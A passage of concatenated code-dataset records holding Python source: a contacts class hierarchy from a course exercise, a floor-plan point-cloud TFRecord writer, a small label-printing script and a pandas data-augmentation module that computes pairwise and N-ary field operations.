ProfessionalContact):\n                if hasattr(olderContact, \"workPhone\"):\n                    self.workPhone = olderContact.workPhone\n                if hasattr(olderContact, \"workEmail\"):\n                    self.workEmail = 
olderContact.workEmail\n\n def ReadValues(self):\n super().ReadValues() # the MRO call from here as i understood from Ronen\n inputVal = None\n while True:\n if hasattr(self, \"workPhone\"):\n oldAttr = self.workPhone\n inputVal = input(\"Work Phone({0}):\".format(oldAttr))\n if inputVal == '':\n self.workPhone = oldAttr\n break\n elif inputVal == 'x':\n del self.workPhone\n break\n elif not inputVal.isdigit():\n print(\"#\\nMyError: Work Phone should contain digits only#\\nTry again pls...\\n#\")\n else:\n self.workPhone = inputVal\n break\n else:\n inputVal = input(\"Work Phone:\")\n if inputVal == '':\n break\n elif not inputVal.isdigit():\n print(\"#\\nMyError: Work Phone should contain digits only#\\nTry again pls...\\n#\")\n else:\n self.workPhone = inputVal\n break\n while True:\n if hasattr(self, \"workEmail\"):\n oldAttr = self.workEmail\n inputVal = input(\"Work Email({0}):\".format(oldAttr))\n if inputVal == '':\n self.workEmail = oldAttr\n break\n elif inputVal == 'x':\n del self.workEmail\n break\n elif global_p.match(inputVal) == None:\n print(\"#\\nMyError: Work Email format is incorrect#\\nTry again pls...\\n#\")\n else:\n self.workEmail = inputVal\n break\n else:\n inputVal = input(\"Work Email:\")\n if inputVal == '':\n break\n elif global_p.match(inputVal) == None:\n print(\"#\\nMyError: Work Email format is incorrect#\\nTry again pls...\\n#\")\n else:\n self.workEmail = inputVal\n break\n\n def GetMyStr(self):\n myStr = \"\"\n if hasattr(self, \"workPhone\"):\n myStr += \"Work Phone: \" + self.workPhone\n if hasattr(self, \"workEmail\"):\n myStr += \", Work Email: \" + self.workEmail\n elif hasattr(self, \"workEmail\"):\n myStr += \"Work Email: \" + self.workEmail\n return myStr\n\n def __str__(self):\n return Contacts.__str__(self) + \", \" + self.GetMyStr()\n\n\nclass ProfessionalFriendContact(FriendContact, ProfessionalContact):\n def __init__(self, olderContact=None):\n # i could construct this class as the others classes of type contacts only to show the use of the ReadValues(..)\n # method, but it seems a little bit to much. so here we have the super proxy using the MRO and in the\n # other classes we have the use of ReadValues(..) as requested!\n # pls notice that we dont even need a c'tor here!! 
, and it is here only for clarity at least for me..\n super().__init__(olderContact)\n\n def __str__(self):\n return FriendContact.__str__(self) + \", \" + ProfessionalContact.GetMyStr(self)\n","sub_path":"Course Programming Languages/Python workPlace/תרגילי הגשה 2016/2/Ex_2/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":10475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287251617","text":"import tensorflow as tf\n\nimport os\nimport cv2\nimport numpy as np\nimport math\nimport pdb\n\nfrom plyfile import PlyData, PlyElement\nimport json\n\nfrom utils import getDensity, drawDensityImage\n\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef _float_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=value))\n\n\ndef read_scene_pc(file_path):\n with open(file_path, 'rb') as f:\n plydata = PlyData.read(f)\n dtype = plydata['vertex'].data.dtype\n print('dtype of file{}: {}'.format(file_path, dtype))\n\n points_data = np.array(plydata['vertex'].data.tolist())\n\n return points_data\n\n\ndef write_scene_pc(points, output_path):\n vertex = np.array([tuple(x) for x in points],\n dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('red', 'u1'), ('green', 'u1'), ('blue', 'u1'), ])\n vertex_el = PlyElement.describe(vertex, 'vertex')\n PlyData([vertex_el]).write(output_path) # write the new ply file\n\n\nclass RecordWriter:\n def __init__(self, num_points, base_dir, phase, im_size, max_num_corners=300):\n self.num_points = num_points\n self.base_dir = base_dir\n self.ply_base_dir = os.path.join(self.base_dir, 'ply')\n self.annot_base_dir = os.path.join(self.base_dir, 'json')\n self.phase = phase\n self.im_size = im_size # HEIGHT, WIDTH = SIZE\n self.max_num_corners = max_num_corners\n\n self.ply_paths, self.annot_paths = self.get_filepaths()\n\n self.writer = tf.python_io.TFRecordWriter(self.base_dir + '_' + self.phase + '.tfrecords')\n\n def get_filepaths(self):\n ply_filenames = sorted(os.listdir(self.ply_base_dir))\n json_filenames = sorted(os.listdir(self.annot_base_dir))\n\n assert len(ply_filenames) == len(json_filenames)\n ply_file_paths = [os.path.join(self.ply_base_dir, filename) for filename in ply_filenames]\n annot_file_paths = [os.path.join(self.annot_base_dir, filename) for filename in json_filenames]\n\n return ply_file_paths, annot_file_paths\n\n def write(self):\n for ply_file_path, annot_file_path in zip(self.ply_paths, self.annot_paths):\n self.write_example(ply_file_path, annot_file_path)\n\n def write_example(self, ply_path, annot_path):\n points = read_scene_pc(ply_path)\n\n xyz = points[:, :3]\n\n mins = xyz.min(0, keepdims=True)\n maxs = xyz.max(0, keepdims=True)\n\n max_range = (maxs - mins)[:, :2].max()\n padding = max_range * 0.05\n \n mins = (maxs + mins) / 2 - max_range / 2\n mins -= padding\n max_range += padding * 2\n\n xyz = (xyz - mins) / max_range\n\n new_points = np.concatenate([xyz, points[:, 3:6]], axis=1)\n points = new_points\n\n if points.shape[0] < self.num_points:\n indices = np.arange(points.shape[0])\n points = np.concatenate([points, points[np.random.choice(indices, self.num_points - points.shape[0])]], axis=0)\n else:\n sampled_indices = np.arange(points.shape[0])\n np.random.shuffle(sampled_indices)\n points = points[sampled_indices[:self.num_points]]\n\n # For testing purpose: draw the 
density image to check the quality\n filename, _ = os.path.splitext(os.path.basename(ply_path))\n write_scene_pc(points, './debug/{}.ply'.format(filename))\n density_img = drawDensityImage(getDensity(points=points))\n cv2.imwrite('./debug/{}_density.png'.format(filename), density_img)\n\n density_img = np.stack([density_img]*3, axis=2)\n annot_image = self.parse_annot(density_img, annot_path, mins, max_range)\n cv2.imwrite('./debug/{}_annot.png'.format(filename), annot_image)\n\n\n\n # points[:, 3:] = points[:, 3:] / 255 - 0.5\n\n # coordinates = np.clip(np.round(points[:, :2] * self.im_size).astype(np.int32), 0, self.im_size - 1)\n\n # points_indices = self.get_projection_indices(coordinates)\n\n # # prepare other g.t. related inputs to be zeros for now\n\n # corner_gt = np.zeros([self.max_num_corners, 3], dtype=np.int64)\n\n # num_corners = 0\n\n # icon_segmentation = np.zeros((self.im_size, self.im_size), dtype=np.uint8)\n\n # room_segmentation = np.zeros((self.im_size, self.im_size), dtype=np.uint8)\n\n # flags = np.zeros(2, np.int64)\n # flags[0] = 1\n # flags[1] = 0\n\n # example = tf.train.Example(features=tf.train.Features(feature={\n # 'image_path': _bytes_feature(file_path),\n # 'points': _float_feature(points.reshape(-1)),\n # 'point_indices': _int64_feature(points_indices.reshape(-1)),\n # 'corner': _int64_feature(corner_gt.reshape(-1)),\n # 'num_corners': _int64_feature([num_corners]),\n # 'icon': _bytes_feature(icon_segmentation.tostring()),\n # 'room': _bytes_feature(room_segmentation.tostring()),\n # 'flags': _int64_feature(flags),\n # }))\n\n # self.writer.write(example.SerializeToString())\n\n def get_projection_indices(self, coordinates):\n indices_map = np.zeros([self.num_points], dtype=np.int64)\n for i, coord in enumerate(coordinates):\n x, y = coord\n indices_map[i] = y * self.im_size + x\n return indices_map\n\n def parse_annot(self, img, file_path, mins, max_range):\n with open(file_path, 'r') as f:\n data = json.load(f)\n\n points = data['points']\n lines = data['lines']\n line_items = data['lineItems']\n areas = data['areas']\n \n point_dict = dict()\n \n for point in points:\n point_dict[point['id']] = point\n\n line_dict = dict()\n for line in lines:\n line_dict[line['id']] = line\n\n # img = np.zeros([self.im_size, self.im_size, 3], dtype=np.uint8)\n\n min_x = mins[0][0]\n min_y = mins[0][1]\n width = height = max_range\n\n # draw all corners\n for point in points:\n img_x, img_y = self._draw_corner_with_scaling(img, (point['x'], point['y']), min_x, width, min_y, height)\n point_dict[point['id']]['img_x'] = img_x\n point_dict[point['id']]['img_y'] = img_y\n \n # draw all line segments\n for line in lines:\n assert len(line['points']) == 2\n point_id_1, point_id_2 = line['points']\n start_pt = (point_dict[point_id_1]['img_x'], point_dict[point_id_1]['img_y'])\n end_pt = (point_dict[point_id_2]['img_x'], point_dict[point_id_2]['img_y'])\n # line_dict[line['id']]['img_start_pt'] = start_pt\n # line_dict[line['id']]['img_end_pt'] = end_pt\n cv2.line(img, start_pt, end_pt, (255,0,0))\n\n # draw all line with labels, such as doors, windows\n for line_item in line_items:\n start_pt = (line_item['startPointAt']['x'], line_item['startPointAt']['y'])\n end_pt = (line_item['endPointAt']['x'], line_item['endPointAt']['y'])\n img_start_pt = self._draw_corner_with_scaling(img, start_pt, min_x, width, min_y, height, color=(0,255,0))\n img_end_pt = self._draw_corner_with_scaling(img, end_pt, min_x, width, min_y, height, color=(0,255,0))\n cv2.line(img, img_start_pt, 
img_end_pt, (0, 255, 255))\n cv2.putText(img, line_item['is'], (img_start_pt[0], img_start_pt[1]-5), cv2.FONT_HERSHEY_SIMPLEX, 0.3, (255,255,255), 1)\n\n print(len(areas))\n return img\n\n def _draw_corner_with_scaling(self, img, corner, min_x, width, min_y, height, color=(0,0,255)):\n img_x = int(math.floor((corner[0] - min_x) * 1.0 / width * self.im_size))\n img_y = int(math.floor((corner[1] - min_y) * 1.0 / height * self.im_size))\n cv2.circle(img, (img_x,img_y), 2, color, -1)\n return img_x, img_y\n\n\n\nif __name__ == '__main__':\n base_dir = '/local-scratch/cjc/Lianjia-inverse-cad/FloorNet/data/first_500/processed_test'\n record_writer = RecordWriter(num_points=50000, base_dir=base_dir, phase='test', im_size=256)\n record_writer.write()\n\n","sub_path":"RecordWriterLianjia.py","file_name":"RecordWriterLianjia.py","file_ext":"py","file_size_in_byte":8227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"131248169","text":"import pickle\n\nwith open('label_facebook_computed', 'rb') as f1:\n\tcomputed = pickle.load(f1)\nfor i in range (100):\n\tdata = computed[(40*i):(40*i+40)]\n\tprint(data)\n\n\n# with open('computed_label', 'rb') as f1:\n# \tcomputed = pickle.load(f1)\n# computed -= 1\n# for i in range (400):\n# \tdata = computed[(10*i):(10*i+10)]\n# \tfor j in range(10):\n# \t\tif data[j] == -1:\n# \t\t\tdata[j] += 3\n# \tprint(data)","sub_path":"check_accuracy.py","file_name":"check_accuracy.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438148970","text":"import numpy as np\nimport pandas as pd\n\nfrom collections import namedtuple\nfrom sklearn.decomposition import NMF, PCA\n\nfrom ...core.config import CONFIG_DATASET_AUGMENT\nfrom ...core.log import MlLog\nfrom ...util.counter_dim import CounterDimIncreasing\nfrom .df_normalize import DfNormalize\nfrom .methods_fields import FieldsParams\n\n\nDEFAULT_ORDER = 2\n\n\ndef _parse_base(base):\n \"\"\" Initialize operations \"\"\"\n if base is None:\n return np.log(2)\n elif base == 'e':\n return 1.0\n else:\n return np.log(base)\n\n\nclass DfAugment(MlLog):\n \"\"\"\n DataFrame augmentation\n \"\"\"\n\n def __init__(self, df, config, outputs, model_type, set_config=True):\n super().__init__(config, CONFIG_DATASET_AUGMENT)\n self.config = config\n self.df = df\n self.dfs = list()\n self.outputs = outputs\n self.model_type = model_type\n self.add = dict()\n self.sub = dict()\n self.div = dict()\n self.log_ratio = dict()\n self.logp1_ratio = dict()\n self.mult = dict()\n self.nmf = dict()\n self.pca = dict()\n self.__dict__['and'] = dict() # Writing 'self.and' is a sysntax error\n if set_config:\n self._set_from_config()\n\n def augment(self, name, augmenter):\n \"\"\" Use an 'augmenter' object to add coluns to the dataFrame \"\"\"\n ret = augmenter()\n if ret is None:\n self._debug(f\"Augment dataframe: Could not do {name}\")\n return False\n else:\n self.dfs.append(ret)\n return True\n\n def __call__(self):\n \"\"\"\n Augment dataframe\n Returns a new (augmented) dataset\n \"\"\"\n if not self.enable:\n self._debug(f\"Augment dataframe disabled, skipping. Config file '{self.config.config_file}', section '{CONFIG_DATASET_AUGMENT}', enable='{self.enable}'\")\n return self.df\n cols = \"', '\".join([c for c in self.df.columns])\n self._info(f\"Augment dataframe: Start. Shape: {self.df.shape}. 
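`_parse_base` above returns the divisor that converts natural-log differences into the requested base, via the identity log_b(x/y) = (ln x - ln y) / ln b; with the default `None` it returns ln 2, so ratios come out in bits. A quick check of that identity, applied the way the log-ratio operation later in this file applies it:

```python
import numpy as np

x = np.array([8.0, 2.0])
y = np.array([2.0, 8.0])
log_base = np.log(2)                       # what _parse_base(None) returns
print((np.log(x) - np.log(y)) / log_base)  # [ 2. -2.]  i.e. log2(x / y)
```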
Fields ({len(self.df.columns)}): ['{cols}']\")\n self._op_add()\n self._op_and()\n self._op_div()\n self._op_log_ratio()\n self._op_logp1_ratio()\n self._op_mult()\n self._op_sub()\n self._nmf()\n self._pca()\n if len(self.dfs) > 0:\n to_join = [self.df]\n to_join.extend(self.dfs)\n df_joined = pd.concat(to_join, axis=1)\n self._info(f\"Augment dataframe: DataFrame has shape {self.df.shape}, results have shapes {[ret.shape for ret in self.dfs]}\")\n self.df = df_joined\n cols = \"', '\".join([c for c in self.df.columns])\n self._info(f\"Augment dataframe: End. Shape: {self.df.shape}. Fields ({len(self.df.columns)}): ['{cols}']\")\n return self.df\n\n def __getstate__(self):\n \" Do not pickle any '_augment' objects \"\n state = self.__dict__.copy()\n to_delete = [k for k in state.keys() if k.endswith('_augment')]\n for k in to_delete:\n del state[k]\n return state\n\n def _op_add(self):\n self.add_augment = DfAugmentOpAdd(self.df, self.config, self.outputs, self.model_type)\n return self.augment('add', self.add_augment)\n\n def _op_and(self):\n self.and_augment = DfAugmentOpAnd(self.df, self.config, self.outputs, self.model_type)\n return self.augment('and', self.and_augment)\n\n def _op_div(self):\n self.divide_augment = DfAugmentOpDiv(self.df, self.config, self.outputs, self.model_type)\n return self.augment('div', self.divide_augment)\n\n def _op_mult(self):\n self.multiply_augment = DfAugmentOpMult(self.df, self.config, self.outputs, self.model_type)\n return self.augment('mult', self.multiply_augment)\n\n def _op_log_ratio(self):\n self.log_ratio_augment = DfAugmentOpLogRatio(self.df, self.config, self.outputs, self.model_type)\n return self.augment('log_ratio', self.log_ratio_augment)\n\n def _op_logp1_ratio(self):\n self.logp1_ratio_augment = DfAugmentOpLogPlusOneRatio(self.df, self.config, self.outputs, self.model_type)\n return self.augment('logp1_ratio', self.logp1_ratio_augment)\n\n def _op_sub(self):\n self.sub_augment = DfAugmentOpSub(self.df, self.config, self.outputs, self.model_type)\n return self.augment('sub', self.sub_augment)\n\n def _nmf(self):\n self.nmf_augment = DfAugmentNmf(self.df, self.config, self.outputs, self.model_type)\n return self.augment('NMF', self.nmf_augment)\n\n def _pca(self):\n self.pca_augment = DfAugmentPca(self.df, self.config, self.outputs, self.model_type)\n return self.augment('PCA', self.pca_augment)\n\n\nclass DfAugmentOpBinary(FieldsParams):\n \"\"\"\n Augment dataset by adding \"binary operations\" between two fields (e.g. 
difference,\n ratio, log ratio, etc.)\n \"\"\"\n\n def __init__(self, df, config, subsection, outputs, model_type, params=None, madatory_params=None):\n super().__init__(df, config, CONFIG_DATASET_AUGMENT, subsection, df.columns, outputs, params, madatory_params)\n self.operation_name = subsection\n self.symmetric = True\n self.min_non_zero_count = 1\n self.order = 2\n\n def calc(self, namefieldparams, x):\n \"\"\"Calculate the operation on pairwise fields from dataframe\n Returns: A dataframe of 'operations' (None on failure)\n \"\"\"\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Start, name={namefieldparams.name}, params={namefieldparams.params}, fields:{namefieldparams.fields}\")\n results = list()\n skip_second = set()\n self._op_init(namefieldparams)\n cols = list()\n for i in range(len(namefieldparams.fields)):\n field_i = namefieldparams.fields[i]\n if not self.can_apply_first(field_i):\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Cannot apply operation '{self.operation_name}' to first field '{field_i}', skipping\")\n continue\n for j in range(len(namefieldparams.fields)):\n if i == j:\n continue\n if self.symmetric and i > j:\n continue\n field_j = namefieldparams.fields[j]\n if field_j in skip_second:\n continue\n if not self.can_apply_second(field_j):\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Cannot apply operation '{self.operation_name}' to second field '{field_j}', skipping\")\n skip_second.add(field_j)\n continue\n res = self.op(field_i, field_j)\n if self.should_add(field_i, field_j, res):\n cols.append(f\"{namefieldparams.name}_{field_i}_{field_j}\")\n results.append(res)\n else:\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Should add returned False, skipping\")\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': End\")\n if len(results) > 0:\n x = np.concatenate(results)\n x = x.reshape(-1, len(results))\n df = self.array_to_df(x, cols)\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': DataFrame joined shape {df.shape}\")\n return df\n return None\n\n def can_apply_first(self, field):\n \"\"\" Can we apply the operation 'op(field_1, field_2) to the first fild 'field_1'? \"\"\"\n return True\n\n def can_apply_second(self, field):\n \"\"\" Can we apply the operation 'op(field_1, field_2) to the second fild 'field_2'? 
\"\"\"\n return True\n\n def op(self, field_i, field_j):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n raise NotImplementedError(\"Unimplemented method, this method should be overiden by a subclass!\")\n\n def _op_init(self, namefieldparams):\n \"\"\" Initialize operations \"\"\"\n min_non_zero = namefieldparams.params.get('min_non_zero')\n if min_non_zero is not None:\n if min_non_zero < 0.0:\n self._error(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Illegal value for 'min_non_zero'={min_non_zero}, ignoring\")\n if 0.0 < min_non_zero and min_non_zero < 1.0:\n self.min_non_zero_count = int(min_non_zero * len(self.df))\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}, min_non_zero: {min_non_zero}, len(df): {len(self.df)}\")\n else:\n self.min_non_zero_count = int(min_non_zero)\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}\")\n\n def should_add(self, field_i, field_j, x):\n \"\"\" Should we add add these results \"\"\"\n count_non_zero = (x != 0.0).sum()\n ok = count_non_zero >= self.min_non_zero_count\n if not ok:\n self._debug(f\"Calculating {self.operation_name}, fields {field_i}, {field_j}: Minimum number of non-zero fields is {self.min_non_zero_count}, but there are only {count_non_zero} non-zeros. Not adding column\")\n return ok\n\n\nclass DfAugmentOpNary(FieldsParams):\n \"\"\"\n Augment dataset by adding \"N-ary operations\" between (two or more) fields (e.g. sum)\n \"\"\"\n\n def __init__(self, df, config, subsection, outputs, model_type, params=None, madatory_params=None):\n super().__init__(df, config, CONFIG_DATASET_AUGMENT, subsection, df.columns, outputs, params, madatory_params)\n self.operation_name = subsection\n self.min_non_zero_count = 1\n self.order = DEFAULT_ORDER\n\n def calc(self, namefieldparams, x):\n \"\"\"\n Calculate the operation on N fields from dataframe\n Returns: A dataframe of 'operations' (None on failure)\n \"\"\"\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Start, name={namefieldparams.name}, params={namefieldparams.params}, fields:{namefieldparams.fields}\")\n results = list()\n self._op_init(namefieldparams)\n cols = list()\n counter = CounterDimIncreasing(len(namefieldparams.fields), self.order)\n count, count_added, count_skipped = 1, 0, 0\n for nums in counter:\n fields = [namefieldparams.fields[i] for i in nums]\n res = self.op(fields)\n count += 1\n if self.should_add(fields, res):\n count_added += 1\n cols.append(f\"{namefieldparams.name}_{'_'.join(fields)}\")\n results.append(res)\n else:\n count_skipped += 1\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Fields {fields}. 
Should add returned False, skipping\")\n if count % 100 == 0:\n self._info(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Minimum non-zero: {self.min_non_zero_count}, count {count}, added {count_added}, skipped {count_skipped}\")\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': End\")\n if len(results) > 0:\n x = np.concatenate(results)\n x = x.reshape(-1, len(results))\n df = self.array_to_df(x, cols)\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': DataFrame joined shape {df.shape}\")\n return df\n return None\n\n def op(self, fields):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n raise NotImplementedError(\"Unimplemented method, this method should be overiden by a subclass!\")\n\n def _op_init(self, namefieldparams):\n \"\"\" Initialize operations \"\"\"\n min_non_zero = namefieldparams.params.get('min_non_zero')\n if min_non_zero is not None:\n if min_non_zero < 0.0:\n self._error(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Illegal value for 'min_non_zero'={min_non_zero}, ignoring\")\n if 0.0 < min_non_zero and min_non_zero < 1.0:\n self.min_non_zero_count = int(min_non_zero * len(self.df))\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}, min_non_zero: {min_non_zero}, len(df): {len(self.df)}\")\n else:\n self.min_non_zero_count = int(min_non_zero)\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}\")\n self.order = namefieldparams.params.get('order')\n if self.order is None:\n self.order = DEFAULT_ORDER\n\n def should_add(self, fields, x):\n \"\"\" Should we add add these results \"\"\"\n count_non_zero = (x != 0.0).sum()\n ok = count_non_zero >= self.min_non_zero_count\n if not ok:\n self._debug(f\"Calculating {self.operation_name}, fields {fields}: Minimum number of non-zero fields is {self.min_non_zero_count}, but there are only {count_non_zero} non-zeros. Not adding column\")\n return ok\n\n\nclass DfAugmentOpNaryIncremental(FieldsParams):\n \"\"\"\n Augment dataset by adding \"N-ary operations\" between (two or more) fields (e.g. 
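`CounterDimIncreasing` is imported from `...util.counter_dim` and not shown here. Assuming it yields strictly increasing index tuples of the configured order, `itertools.combinations` reproduces the traversal that `calc` uses to visit each unordered field subset exactly once:

```python
from itertools import combinations

fields = ['f1', 'f2', 'f3']
order = 2
for nums in combinations(range(len(fields)), order):
    # each subset appears once, in increasing index order
    print([fields[i] for i in nums])   # ['f1','f2'], ['f1','f3'], ['f2','f3']
```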
'and') in an incremental way\n This is much more efficient when there are many new values not incorporated due to having too many zeros.\n \"\"\"\n\n def __init__(self, df, config, subsection, outputs, model_type, params=None, madatory_params=None):\n super().__init__(df, config, CONFIG_DATASET_AUGMENT, subsection, df.columns, outputs, params, madatory_params)\n self.operation_name = subsection\n self.min_non_zero_count = 1\n self.order = DEFAULT_ORDER\n\n def calc(self, namefieldparams, x):\n \"\"\"\n Calculate the operation on N fields from dataframe\n Returns: A dataframe of 'operations' (None on failure)\n \"\"\"\n self._info(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Start, name={namefieldparams.name}, params={namefieldparams.params}, fields:{namefieldparams.fields}\")\n self._op_init(namefieldparams)\n aug_dict = self.incremental_init(namefieldparams)\n if self.order < 2:\n self._error(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Order is less than 2 (order='{self.order}')\")\n return None\n for i in range(1, self.order):\n self.incremental(namefieldparams)\n df = self.get_results(namefieldparams)\n self._info(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': End, dataframe.shape: {df.shape if df is not None else '-'}\")\n return df\n\n def convert_result(self, x):\n return x.astype('float')\n\n def field_nums_to_name(self, namefieldparams, field_nums):\n \"\"\" Convert a list of field numbers to field names \"\"\"\n fields = [namefieldparams.fields[fn] for fn in field_nums]\n return f\"{namefieldparams.name}_{'_'.join(fields)}\"\n\n def get_augment_key(self, fieldnum_list):\n \"\"\" Get key for augment dictionary (indexed by field numbers) \"\"\"\n return '\\t'.join([str(i) for i in fieldnum_list])\n\n def get_results(self, namefieldparams):\n \"\"\" Get all results frmo self.augment dictionary into a dataframe \"\"\"\n results, col_names = list(), list()\n # Add all items in dict, create a list of column names\n keys = sorted(list(self.augment.keys()))\n for key in keys:\n x = self.convert_result(self.augment[key])\n results.append(x)\n col_name = self.field_nums_to_name(namefieldparams, self.augment_fieldnums[key])\n col_names.append(col_name)\n # Merge into a dataframe\n if len(results) > 0:\n df = pd.concat(results, axis=1)\n df.columns = col_names\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': DataFrame joined shape {df.shape}\")\n return df\n return None\n\n def incremental_init(self, namefieldparams):\n \"\"\" Initialize incremental dictionaries indexed by field numbers (as strings) \"\"\"\n self.augment = dict()\n self.augment_fieldnums = dict()\n for fnum in range(len(namefieldparams.fields)):\n field = namefieldparams.fields[fnum]\n self.set_augment([fnum], self.init(field))\n\n def incremental(self, namefieldparams):\n \"\"\" Incrementally add one field at a time \"\"\"\n augment = dict()\n augment_fieldnums = dict()\n count, count_added, count_skipped = 1, 0, 0\n for key in self.augment.keys():\n value = self.augment[key]\n fnlist = self.augment_fieldnums[key]\n fnmax = max(fnlist)\n fields = [namefieldparams.fields[fn] for fn in fnlist]\n # Iterate over all fields we can add. 
We don't want to repeat fields, so number of fields is always incrementing\n for fnum in range(fnmax + 1, len(namefieldparams.fields)):\n count += 1\n field = namefieldparams.fields[fnum]\n x = self.op_inc(value, field)\n if self.should_add(fields, field, x):\n # Add to new entry (old list of field numbers + new field number)\n count_added += 1\n fnlist_new = fnlist.copy()\n fnlist_new.append(fnum)\n key = self.get_augment_key(fnlist_new)\n augment[key] = x\n augment_fieldnums[key] = fnlist_new\n else:\n count_skipped += 1\n if count % 100 == 0:\n self._info(f\"Incremental calculation {self.operation_name}, name: '{namefieldparams.name}': Minimum non-zero: {self.min_non_zero_count}, count {count}, added {count_added}, skipped {count_skipped}, fields {fields} + {field}\")\n # Update incremental values\n self.augment = augment\n self.augment_fieldnums = augment_fieldnums\n\n def init(self, field):\n return self.df[field]\n\n def op(self, fields):\n \"\"\"\n Calculate the arithmetic operation between the two fields\n @returns A Pandas Series\n \"\"\"\n raise NotImplementedError(\"Unimplemented method, this method should be overiden by a subclass!\")\n\n def _op_init(self, namefieldparams):\n \"\"\" Initialize operations \"\"\"\n min_non_zero = namefieldparams.params.get('min_non_zero')\n if min_non_zero is not None:\n if min_non_zero < 0.0:\n self._error(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Illegal value for 'min_non_zero'={min_non_zero}, ignoring\")\n if 0.0 < min_non_zero and min_non_zero < 1.0:\n self.min_non_zero_count = int(min_non_zero * len(self.df))\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}, min_non_zero: {min_non_zero}, len(df): {len(self.df)}\")\n else:\n self.min_non_zero_count = int(min_non_zero)\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}\")\n self.order = namefieldparams.params.get('order')\n if self.order is None:\n self.order = DEFAULT_ORDER\n\n def set_augment(self, fieldnum_list, value):\n \"\"\" Set an entry in augment dictionaty (indexed by field numbers) \"\"\"\n key = self.get_augment_key(fieldnum_list)\n self.augment[key] = value\n self.augment_fieldnums[key] = fieldnum_list\n\n def should_add(self, fields, field, x):\n \"\"\" Should we add add these results \"\"\"\n count_non_zero = (x != 0.0).sum()\n ok = count_non_zero >= self.min_non_zero_count\n if ok:\n self._debug(f\"Calculating {self.operation_name}, fields {fields} + {field}: Number of non-zero fields {count_non_zero} >= {self.min_non_zero_count}, OK\")\n else:\n self._debug(f\"Calculating {self.operation_name}, fields {fields} + {field}: Minimum number of non-zero fields is {self.min_non_zero_count}, but there are only {count_non_zero} non-zeros. 
Not adding column\")\n return ok\n\n\nclass DfAugmentOpAdd(DfAugmentOpNary):\n \"\"\" Augment dataset by adding two or more fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'add', outputs, model_type, params=['min_non_zero', 'order'])\n\n def op(self, fields):\n \"\"\" Calculate the arithmetic operation between the two or more fields \"\"\"\n return self.df[fields].sum(axis=1)\n\n\nclass DfAugmentOpAnd(DfAugmentOpNaryIncremental):\n \"\"\" Augment dataset by performing 'and' of two or more fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'and', outputs, model_type, params=['min_non_zero', 'order', 'threshold'])\n\n def init(self, field):\n return self.df[field] > self.threshold\n\n def _op_init(self, namefieldparams):\n super()._op_init(namefieldparams)\n self.threshold = namefieldparams.params.get('threshold')\n if self.threshold is None:\n self.threshold = 0.0\n\n def op_inc(self, x, field):\n \"\"\" Calculate the (incremental) 'and' operation between the a value and a field \"\"\"\n return x & (self.df[field] > self.threshold)\n\n\nclass DfAugmentOpDiv(DfAugmentOpBinary):\n \"\"\" Augment dataset by dividing two fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'div', outputs, model_type, params=['min_non_zero'])\n\n def can_apply_second(self, field):\n \"\"\" We apply this operation only if all numbers in the second field are non-zero \"\"\"\n return (self.df[field] != 0).all()\n\n def op(self, field_i, field_j):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n return self.df[field_i] / self.df[field_j]\n\n\nclass DfAugmentOpLogRatio(DfAugmentOpBinary):\n \"\"\" Augment dataset by applying the log ratio of two fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'log_ratio', outputs, model_type, params=['base', 'min_non_zero'])\n\n def can_apply_first(self, field):\n \"\"\" We apply this operation if all numbers in the first field are positive \"\"\"\n return (self.df[field] > 0).all()\n\n def can_apply_second(self, field):\n \"\"\" We apply this operation if all numbers in the second field are positive \"\"\"\n return (self.df[field] > 0).all()\n\n def op(self, field_i, field_j):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n 